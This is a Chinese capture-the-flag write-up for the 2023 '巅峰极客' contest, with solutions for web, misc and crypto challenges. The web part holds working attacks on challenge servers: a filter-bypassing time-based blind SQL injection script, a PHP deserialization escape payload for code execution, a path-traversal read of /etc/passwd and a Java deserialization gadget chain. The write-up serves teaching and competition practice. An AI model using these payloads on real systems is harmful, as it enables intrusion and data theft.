2023“巅峰极客”网络安全技能挑战赛
目录
参考:
https://mp.weixin.qq.com/s/DvRYMkFSr9SFqt_M0f8umg
https://mp.weixin.qq.com/s/gOkixXbYSUewUlhd82CkeQ
https://fq6p9pyo5tt.feishu.cn/docx/PPG0dCRT4oPLGOxotaicGSKonsc
Web
hellosql
过滤：sleep, benchmark, union, if, *（常规的时间盲注 / 联合注入手段都被拦下）
延时来源：information_schema.columns 自连接产生的笛卡尔积（heavy query）。它放在 CASE 的 then 分支里，只有条件为真时才执行，于是用响应时间区分真假（脚本以 0.5s 为阈值，网络抖动大时需要调高）。
exp.py
import requests
import string
import time
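URL = "http://web-c4a5345842.challenge.xctf.org.cn:80/"
# A TRUE probe runs the heavy cartesian-product subquery; any response slower
# than this many seconds is read as TRUE. Raise it on a jittery link, or the
# binary search silently walks off in the wrong direction.
DELAY_THRESHOLD = 0.5
# Bound each request so a stalled connection cannot hang the extraction.
REQUEST_TIMEOUT = 30
# Injected into the `id` parameter. sleep/benchmark/union/if are filtered, so
# the delay comes from a self-join of information_schema.columns that only
# runs when the CASE condition holds (no ELSE -> NULL -> falsy, fast path).
PAYLOAD = (
    "' or case when ascii(substr((select(group_concat(Flagg)) from ctf.Flllag), {}, 1)) > {} "
    "then (select max(t1.TABLE_NAME) from information_schema.columns t1, "
    "information_schema.columns t2) end#"
)


def char_is_greater(index: int, value: int) -> bool:
    """Timing oracle: is ascii(flag[index]) > value? (index is 1-based)."""
    payload = PAYLOAD.format(index, value)
    started = time.monotonic()
    requests.get(url=URL, params={"id": payload}, timeout=REQUEST_TIMEOUT)
    return time.monotonic() - started >= DELAY_THRESHOLD


def search_char(is_greater, low: int = 32, high: int = 127) -> int:
    """Binary-search one code point in [low, high] with a "> value" oracle.

    Returns the smallest value v for which is_greater(v) is false, i.e. the
    character's code. For a position past the end of the string MySQL's
    ascii() yields 0, so the search bottoms out at `low`.
    """
    while low < high:
        mid = (low + high) // 2
        if is_greater(mid):
            low = mid + 1
        else:
            high = mid
    return low


def extract_flag(is_greater=char_is_greater, max_len: int = 99, pause: float = 0.1) -> str:
    """Recover the flag character by character.

    is_greater(index, value) is the oracle (network-backed by default, injectable
    for testing); `pause` is the delay between positions. Stops at the first
    position that resolves to 32 (end of string) or 127 (out of range).
    """
    flag = ""
    for index in range(1, max_len + 1):
        time.sleep(pause)
        code = search_char(lambda value, i=index: is_greater(i, value))
        if code in (32, 127):
            break
        print(index)
        flag += chr(code)
        print("flag:" + flag)
    return flag


if __name__ == "__main__":
    print(extract_flag())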
unserialize
考点：反序列化字符逃逸（过滤函数把 bbbbbb 替换成 aaaa，内容变短但序列化的 s:N 长度前缀不变）+ 无字母数字 RCE（对 phpinfo 按位取反绕过）。
<?php
/**
 * Inner carrier for the command string.
 *
 * The property is private, so its serialized key is "\0pull_it\0x"
 * (10 bytes including the two NUL bytes) -- hence the s:10 and the %00
 * in the hand-built payload.
 */
class pull_it{
    /** @var mixed whatever was passed to the constructor (the payload's command) */
    private $x;

    public function __construct($a){
        $this->x = $a;
    }
}
/**
 * Outer object: root and pwd are both user-supplied in the challenge.
 *
 * Private properties serialize as "\0push_it\0root" (13 bytes) and
 * "\0push_it\0pwd" (12 bytes); those lengths are what the escape below
 * has to reproduce exactly.
 */
class push_it{
    /** @var mixed first constructor argument (the string that gets shrunk by the filter) */
    private $root;
    /** @var mixed second constructor argument (the string the parser escapes into) */
    private $pwd;

    public function __construct($a, $b){
        $this->root = $a;
        $this->pwd = $b;
    }
}
/**
 * The challenge's filter: every "bbbbbb" becomes "aaaa".
 *
 * Each match shrinks the string by 2 bytes while the s:N: length prefixes
 * computed before the filter stay unchanged -- that mismatch is the whole
 * basis of the escape.
 */
function a($data) {
    $shrunk = str_replace('bbbbbb', 'aaaa', $data);
    return $shrunk;
}
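// Target command written without letters or digits: the seven %XX bytes are
// the bitwise NOT of "phpinfo", so (~"...")() calls phpinfo() at runtime.
// The %XX escapes are URL encoding; the server decodes each to one byte, so
// the serialized length of $cmd there is s:13, not the s:27 seen locally.
$cmd = '(~%8F%97%8F%96%91%99%90)();'; # phpinfo();
$push = new push_it('mof', new pull_it($cmd));
$payload = serialize($push);
// Reference shape of the target object (NUL bytes around the class names are
// invisible in a plain echo):
# O:7:"push_it":2:{s:13:"push_itroot";s:3:"mof";s:12:"push_itpwd";O:7:"pull_it":1:{s:10:"pull_itx";s:27:"(~%8F%97%8F%96%91%99%90)();";}}

// Escape: a() turns each "bbbbbb" into "aaaa" (-2 bytes) while root's length
// prefix stays s:84, so unserialize reads 84 bytes: the 56 a's plus the next
// 28 bytes -- exactly `";s:12:"\0push_it\0pwd";s:NN:"` -- and then continues
// parsing inside $pwd, where a fake pwd property holding the pull_it object
// is spliced in. 14 groups of bbbbbb give the required 28 bytes of slack.
$root = str_repeat('bbbbbb', 14); // 84 bytes
$pwd = '";s:12:"' . "\0push_it\0pwd" . '";O:7:"pull_it":1:{s:10:"' . "\0pull_it\0x"
    . '";s:13:"(~%8F%97%8F%96%91%99%90)();";}';
// NOTE(review): after pull_it's closing "}" the parser still needs a "}" to
// close push_it, but the leftover tail of the original string starts with
// `";}`. If unserialize returns false / reports an offset error, append one
// more "}" to $pwd; trailing junk after a complete object is ignored.
// Print the NUL bytes as %00 so the output can be pasted into a request body.
echo str_replace("\0", '%00', serialize(new push_it($root, $pwd)));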
注意点：
- private 属性序列化后的成员名是 %00类名%00成员名（类名两侧各一个 NUL 字节，并计入 s:N 的长度）。直接 echo 看不到这两个 NUL，发包时要自行写成 %00。
- 需要被 root 字符串"吞掉"的片段是 ";s:12:"%00push_it%00pwd";s:89:"，长度 28；每个 bbbbbb 被替换成 aaaa 少 2 个字符，因此 root 需要 14 个 bbbbbb（84 字节：过滤后剩 56 字节，加上吞掉的 28 字节正好等于 s:84）。本地 echo 里的 s:89 是不含 NUL 的长度，服务端实际数值不同，但仍是两位数，所以被吞掉的长度不变。
- 本地序列化得到的是 s:27:"(~%8F%97%8F%96%91%99%90)();"，服务端 URL 解码后每个 %XX 只占一个字节，要按实际字节数改成 s:13。
- 原文"最后要舍弃一个 }"：pwd 中 pull_it 的 } 之后，原串还剩 ";}。unserialize 读完 push_it 的两个属性后还需要一个 } 收尾；若返回 false 或报 offset 错误，可在 pwd 末尾再补一个 }，多余的 ";} 会作为尾随数据被忽略。
payload:
#post
root=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&pwd=";s:12:"%00push_it%00pwd";O:7:"pull_it":1:{s:10:"%00pull_it%00x";s:13:"(~%8F%97%8F%96%91%99%90)();";}
hinder
任意文件读取：对路径段 hinder 做 URL 编码（/%68%69%6e%64%65%72/）绕过过滤，download.action 的 filename 参数可用 ../ 穿越读取任意文件。
/%68%69%6e%64%65%72/download.action?filename=../../../../../../../etc/passwd
读取 /proc/1/cmdline
得到容器启动命令 /bin/sh /run.sh（cmdline 中各参数以 NUL 分隔，页面上会显示成连在一起的 /bin/sh/run.sh）
读取 /run.sh
run.sh 中给出 flag 所在路径 /oh_u_f1nd_me，再读取该文件即可
BabyURL（本题参考上方链接中的 writeup）
Jackson 二次反序列化：通过 POJONode 调用 SignedObject.getObject() 触发二次反序列化，内层 URLHelper 的 netdoc: 协议可以列目录，把 flag 读到 /tmp/file 中即可。
/**
 * Builds the BabyURL gadget chain and hands it to serialize().
 *
 * Chain (from the write-up): BadAttributeValueExpException.val -> POJONode
 * -> SignedObject.getObject() (second deserialization) -> URLHelper, whose
 * visiter opens a netdoc: URL that lists a directory. The DSA key pair
 * exists only to construct a valid SignedObject; any key works.
 *
 * @param args unused
 * @throws Exception propagated from the crypto API and the helpers
 */
public static void main(String[] args) throws Exception {
    URLVisiter visiter = new URLVisiter();
    URLHelper helper = new URLHelper("netdoc:///F14gIsHereY0UGOTIT");
    helper.visiter = visiter;

    KeyPairGenerator generator = KeyPairGenerator.getInstance("DSA");
    generator.initialize(1024);
    PrivateKey signingKey = generator.genKeyPair().getPrivate();
    SignedObject signed = new SignedObject(helper, signingKey, Signature.getInstance("DSA"));

    // Jackson node wrapping the SignedObject; its toString() path is what
    // reaches getObject().
    POJONode node = new POJONode(signed);
    BadAttributeValueExpException trigger = new BadAttributeValueExpException(11);
    // setFiledValue (sic) is a reflection helper defined elsewhere in the project.
    setFiledValue(trigger, "val", node);
    serialize(trigger);
    // unserialize("ser.bin");
}
MISC
welcome
base64解码
foundme
dmp文件,010editor查看,搜索flag
It's just a dump file, and you've found a new lead
Maybe you know the Netflix picture format? Hope this hint helps you. Search for more information to find the flag!
Netflix图片格式为avif,AVIF的文件头为00 00 00 XX 66 74 79 70
从 00 00 00 1C 66 74 79 70（ftyp box）开始截取，去掉尾部多余的 00 填充，另存为 .avif
查看图片
Crypto
数学但高中
x=4{0<y<6}
y=4{2<x<6,17<x<18,28<x<30,41<x<42}
y=6{4<x<6,15<x<16,17<x<19,41<x<43,50<x<51}
x=7{0<y<6}
(x-9)^2+(y-3)^2=1
x=10{2<y<3}
(x-12)^2+(y-3)^2=1
x=13{0<y<3}
y=0{11<x<13,15<x<16,50<x<51}
y=-x+17{14<x<15}
y=x-11{14<x<15}
x=15{0<y<2,4<y<6}
x=17{1<y<6}
x=19{3<y<4}
x=21{3<y<4}
(x-20)^2+(y-3)^2=1{2<y<3}
(x-23)^2+(y-3)^2=1{3<y<4}
x=22{2<y<3}
x=24{2<y<3}
(x-26)^2+(y-3)^2=1{25<x<26}
y=0.5x-11{26<x<27}
y=-0.5x+17{26<x<27}
y=2{29<x<30,31<x<33,39<x<40}
x=29{2<y<5}
x=32{2<y<5}
y=x-27{31<x<32}
(x-34)^2+((y-3.5)^2)/(1.5^2)=1
x=36{2<y<3}
(x-37)^2+(y-3)^2=1{3<y<4}
x=38{2<y<3}
x=41{2<y<6}
x=44{3<y<4}
(x-45)^2+(y-3)^2=1{2<y<3}
x=46{3<y<4}
x=47{2<y<3}
(x-48)^2+(y-3)^2=1{3<y<4}
x=49{2<y<3}
x=51{0<y<2,4<y<6}
y=x-49{51<x<52}
y=-x+55{51<x<52}
函数画图
https://www.desmos.com/calculator?lang=zh-CN
（括号复制不进去，需要手动输入）
Simple_encryption
1.py
from Crypto.Util.number import *
import gmpy2
import random
import binascii
from secret import flag
# --- Part 1: the public element g1 is congruent to 1 mod p ---
p = getStrongPrime(1024)
q = getStrongPrime(1024)
N = p * q
g = getRandomRange(1, N)
r1 = getRandomRange(1, N)
r2 = getRandomRange(1, N)
# g1 = g^(r1*(p-1)) is 1 (mod p) by Fermat whenever gcd(g, p) == 1, so
# gcd(g1 - 1, N) recovers p and every c1 = m*g1^s mod N equals m mod p.
g1 = pow(g, r1 * (p - 1), N)
g2 = pow(g, r2 * (q - 1), N)
def encrypt(m):
    """Blind m with random powers of g1 and g2 mod N, print and return both.

    Uses the module globals g1, g2 and N. Because g1 is 1 mod p (see its
    definition), c1 is congruent to m mod p regardless of s1: whoever factors
    N via gcd(g1 - 1, N) reads m off c1 directly, which is what exp.py does.

    Returns:
        (c1, c2) as ints.
    """
    s1 = getRandomRange(1, N)
    s2 = getRandomRange(1, N)
    c1 = m * pow(g1, s1, N) % N
    c2 = m * pow(g2, s2, N) % N
    print("c1=", c1)
    print("c2=", c2)
    return (c1, c2)
# Encrypt the first half of the flag under part 1 and publish N and g1
# (g2 is not printed).
first_half = flag[:len(flag) // 2]
c = encrypt(bytes_to_long(first_half))
print('N=', N)
print('g1=', g1)
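def pad(msg, length):
    """Right-pad msg (bytes) to `length` bytes with k copies of byte k, k = length - len(msg).

    This has the PKCS#7 shape without its guarantees: when msg is already
    `length` bytes nothing is appended (k == 0), so the last byte of such a
    message cannot be told apart from padding, and nothing validates the pad
    on the way back.

    Raises:
        ValueError: if msg is longer than length, or if more than 255 pad
            bytes would be needed. (The original chr(k).encode('utf-8')
            silently emitted two bytes per pad byte for k >= 128, making the
            result longer than `length`; bytes([k]) is exact.)
    """
    k = length - len(msg)
    if k < 0:
        raise ValueError("message longer than target length")
    if k > 255:
        raise ValueError("pad length does not fit in one byte")
    return msg + bytes([k]) * k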
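# --- Part 2: textbook RSA (e = 5) on a small quadratic of each chunk ---
p = getStrongPrime(1024)
q = getStrongPrime(1024)
assert (p != q)
n = p * q
e = 5
d = inverse(e, (p - 1) * (q - 1))
# The original check `e * d % (p - 1) * (q - 1)` parses as
# ((e*d) % (p-1)) * (q-1), which is non-zero for essentially any d and so
# never fires; the intended sanity check is that d inverts e modulo phi(n).
assert e * d % ((p - 1) * (q - 1)) == 1
flag = pad(flag[len(flag) // 2:], 48)
# Three 16-byte chunks as big-endian integers (each < 2^128).
m = [int.from_bytes(flag[i * 16:i * 16 + 16], "big") for i in range(3)]
print('S=', sum(m) % n)
cnt = len(m)
A = [(i + 128) ** 2 for i in range(cnt)]
B = [(i + 1024) for i in range(cnt)]
C = [(i + 512) for i in range(cnt)]
# NOTE(review): A[i]*m^2 + B[i]*m + C[i] is about 2^270, so its 5th power
# (~2^1350) is smaller than the 2048-bit n. No modular reduction happens and
# an integer 5th root inverts this without d -- exactly what exp.py does.
Cs = [pow(A[i] * m[i] ** 2 + B[i] * m[i] + C[i], e, n) for i in range(cnt)]
print('N=', n)
print('e=', e)
print('Cs=', Cs)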
'''
c1= 19024563955839349902897822692180949371550067644378624199902067434708278125346234824900117853598997270022872667319428613147809325929092749312310446754419305096891122211944442338664613779595641268298482084259741784281927857614814220279055840825157115551456554287395502655358453270843601870807174309121367449335110327991187235786798374254470758957844690258594070043388827157981964323699747450405814713722613265012947852856714100237325256114904705539465145676960232769502207049858752573601516773952294218843901330100257234517481221811887136295727396712894842769582824157206825592614684804626241036297918244781918275524254
c2= 11387447548457075057390997630590504043679006922775566653728699416828036980076318372839900947303061300878930517069527835771992393657157069014534366482903388936689298175411163666849237525549902527846826224853407226289495201341719277080550962118551001246017511651688883675152554449310329664415179464488725227120033786305900106544217117526923607211746947511746335071162308591288281572603417532523345271340113176743703809868369623401559713179927002634217140206608963086656140258643119596968929437114459557916757824682496866029297120246221557017875892921591955181714167913310050483382235498906247018171409256534124073270350
N= 21831630625212912450058787218272832615084640356500740162478776482071876178684642739065105728423872548532056206845637492058465613779973193354996353323494373418215019445325632104575415991984764454753263189235376127871742444636236132111097548997063091478794422370043984009615893441148901566420508196170556189546911391716595983110030778046242014896752388438535131806524968952947016059907135882390507706966746973544598457963945671064540465259211834751973065197550500334726779434679470160463944292619173904064826217284899341554269864669620477774678605962276256707036721407638013951236957603286867871199275024050690034901963
g1= 20303501619435729000675510820217420636246553663472832286487504757515586157679361170332171306491820918722752848685645096611030558245362578422584797889428493611704976472409942840368080016946977234874471779189922713887914075985648876516896823599078349725871578446532134614410886658001724864915073768678394238725788245439086601955497248593286832679485832319756671985505398841701463782272300202981842733576006152153012355980197830911700112001441621619417349747262257225469106511527467526286661082010163334100555372381681421874165851063816598907314117035131618062582953512203870615406642787786668571083042463072230605649134
S= 234626762558445335519229319778735528295
N= 28053749721930780797243137464055357921262616541619976645795810707701031602793034889886420385567169222962145128498131170577184276590698976531070900776293344109534005057067680663813430093397821366071365221453788763262381958185404224319153945950416725302184077952893435265051402645871699132910860011753502307815457636525137171681463817731190311682277171396235160056504317959832747279317829283601814707551094074778796108136141845755357784361312469124392408642823375413433759572121658646203123677327551421440655322226192031542368496829102050186550793124020718643243789525477209493783347317576783265671566724068427349961101
e= 5
Cs= [1693447496400753735762426750097282582203894511485112615865753001679557182840033040705025720548835476996498244081423052953952745813186793687790496086492136043098444304128963237489862776988389256298142843070384268907160020751319313970887199939345096232529143204442168808703063568295924663998456534264361495136412078324133263733409362366768460625508816378362979251599475109499727808021609000751360638976, 2240772849203381534975484679127982642973364801722576637731411892969654368457130801503103210570803728830063876118483596474389109772469014349453490395147031665061733965097301661933389406031214242680246638201663845183194937353509302694926811282026475913703306789097162693368337210584494881249909346643289510493724709324540062077619696056842225526183938442535866325407085768724148771697260859350213678910949, 5082341111246153817896279104775187112534431783418388292800705085458704665057344175657566751627976149342406406594179073777431676597641200321859622633948317181914562670909686170531929552301852027606377778515019377168677204310642500744387041601260593120417053741977533047412729373182842984761689443959266049421034949822673159561609487404082536872314636928727833394518122974630386280495027169465342976]
'''
exp.py
import math

import gmpy2
from sympy import *
from Crypto.Util.number import *
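# --- values copied from the challenge output (see the dump above) ---
Cs = [
    1693447496400753735762426750097282582203894511485112615865753001679557182840033040705025720548835476996498244081423052953952745813186793687790496086492136043098444304128963237489862776988389256298142843070384268907160020751319313970887199939345096232529143204442168808703063568295924663998456534264361495136412078324133263733409362366768460625508816378362979251599475109499727808021609000751360638976,
    2240772849203381534975484679127982642973364801722576637731411892969654368457130801503103210570803728830063876118483596474389109772469014349453490395147031665061733965097301661933389406031214242680246638201663845183194937353509302694926811282026475913703306789097162693368337210584494881249909346643289510493724709324540062077619696056842225526183938442535866325407085768724148771697260859350213678910949,
    5082341111246153817896279104775187112534431783418388292800705085458704665057344175657566751627976149342406406594179073777431676597641200321859622633948317181914562670909686170531929552301852027606377778515019377168677204310642500744387041601260593120417053741977533047412729373182842984761689443959266049421034949822673159561609487404082536872314636928727833394518122974630386280495027169465342976,
]
e = 5
n = 28053749721930780797243137464055357921262616541619976645795810707701031602793034889886420385567169222962145128498131170577184276590698976531070900776293344109534005057067680663813430093397821366071365221453788763262381958185404224319153945950416725302184077952893435265051402645871699132910860011753502307815457636525137171681463817731190311682277171396235160056504317959832747279317829283601814707551094074778796108136141845755357784361312469124392408642823375413433759572121658646203123677327551421440655322226192031542368496829102050186550793124020718643243789525477209493783347317576783265671566724068427349961101
# Coefficients of the public quadratic applied to each 16-byte chunk in the
# generator: A[i] = (i + 128)**2, B[i] = i + 1024, C[i] = i + 512.
A = [128**2, 129**2, 130**2]
B = [1024, 1025, 1026]
C = [512, 513, 514]
c1 = 19024563955839349902897822692180949371550067644378624199902067434708278125346234824900117853598997270022872667319428613147809325929092749312310446754419305096891122211944442338664613779595641268298482084259741784281927857614814220279055840825157115551456554287395502655358453270843601870807174309121367449335110327991187235786798374254470758957844690258594070043388827157981964323699747450405814713722613265012947852856714100237325256114904705539465145676960232769502207049858752573601516773952294218843901330100257234517481221811887136295727396712894842769582824157206825592614684804626241036297918244781918275524254
# c2 is not needed: the p-side ciphertext alone leaks the plaintext.
c2 = 11387447548457075057390997630590504043679006922775566653728699416828036980076318372839900947303061300878930517069527835771992393657157069014534366482903388936689298175411163666849237525549902527846826224853407226289495201341719277080550962118551001246017511651688883675152554449310329664415179464488725227120033786305900106544217117526923607211746947511746335071162308591288281572603417532523345271340113176743703809868369623401559713179927002634217140206608963086656140258643119596968929437114459557916757824682496866029297120246221557017875892921591955181714167913310050483382235498906247018171409256534124073270350
g1 = 20303501619435729000675510820217420636246553663472832286487504757515586157679361170332171306491820918722752848685645096611030558245362578422584797889428493611704976472409942840368080016946977234874471779189922713887914075985648876516896823599078349725871578446532134614410886658001724864915073768678394238725788245439086601955497248593286832679485832319756671985505398841701463782272300202981842733576006152153012355980197830911700112001441621619417349747262257225469106511527467526286661082010163334100555372381681421874165851063816598907314117035131618062582953512203870615406642787786668571083042463072230605649134
N = 21831630625212912450058787218272832615084640356500740162478776482071876178684642739065105728423872548532056206845637492058465613779973193354996353323494373418215019445325632104575415991984764454753263189235376127871742444636236132111097548997063091478794422370043984009615893441148901566420508196170556189546911391716595983110030778046242014896752388438535131806524968952947016059907135882390507706966746973544598457963945671064540465259211834751973065197550500334726779434679470160463944292619173904064826217284899341554269864669620477774678605962276256707036721407638013951236957603286867871199275024050690034901963


def long_to_bytes(x: int) -> bytes:
    """Minimal big-endian encoding of a non-negative int (0 -> b'\\x00').

    Stdlib stand-in for Crypto.Util.number.long_to_bytes so the solver runs
    without pycryptodome/gmpy2/sympy.
    """
    return x.to_bytes(max(1, (x.bit_length() + 7) // 8), "big")


def int_root(x: int, k: int) -> int:
    """Floor of the integer k-th root of x >= 0 (binary search on exact ints)."""
    if x < 2:
        return x
    lo, hi = 0, 1 << (x.bit_length() // k + 1)  # hi**k > x by construction
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid**k <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def recover_chunk(ct: int, a: int, b: int, c: int, exp: int = 5) -> int:
    """Invert ct = (a*m^2 + b*m + c)^exp when the power never wrapped mod n.

    With m < 2^128 and exp = 5 the base is ~2^270, so the 5th power (~2^1350)
    is below the 2048-bit modulus: ct is the plain integer power, and an exact
    integer root plus the quadratic formula return m without the private key.
    The positive root is taken (the original picked sympy's result[1]).

    Raises:
        ValueError: if the root or the quadratic is not exact, i.e. the
            no-wrap assumption does not hold for this ciphertext.
    """
    v = int_root(ct, exp)
    if v**exp != ct:
        raise ValueError("ciphertext is not an exact %d-th power; reduction mod n occurred" % exp)
    disc = b * b - 4 * a * (c - v)
    s = math.isqrt(disc)
    if s * s != disc:
        raise ValueError("quadratic has no integer root")
    num = -b + s
    if num % (2 * a):
        raise ValueError("quadratic root is not an integer")
    return num // (2 * a)


def unpad(data: bytes, block: int = 48) -> bytes:
    """Strip the generator's pad: k trailing bytes each equal to k (0 < k < block).

    Returns data unchanged when the tail is not such a pad, including the
    k == 0 case the generator leaves ambiguous.
    """
    if not data:
        return data
    k = data[-1]
    if 0 < k < block and len(data) >= k and data[-k:] == bytes([k]) * k:
        return data[:-k]
    return data


def recover_second_half(cs, a, b, c, exp: int = 5) -> bytes:
    """Decrypt every chunk with recover_chunk, join them and strip the pad."""
    chunks = [long_to_bytes(recover_chunk(ct, ai, bi, ci, exp)) for ct, ai, bi, ci in zip(cs, a, b, c)]
    return unpad(b"".join(chunks))


def recover_first_half(c1: int, g1: int, modulus: int) -> bytes:
    """g1 = g^(r1*(p-1)) is 1 mod p, so gcd(g1 - 1, N) = p and c1 = m (mod p).

    Raises:
        ValueError: if the gcd is trivial (g1 does not split the modulus).
    """
    p = math.gcd(g1 - 1, modulus)
    if p in (1, modulus):
        raise ValueError("gcd(g1 - 1, N) does not split N")
    return long_to_bytes(c1 % p)


if __name__ == "__main__":
    flag1 = recover_first_half(c1, g1, N)
    flag2 = recover_second_half(Cs, A, B, C, e)
    print(flag1 + flag2)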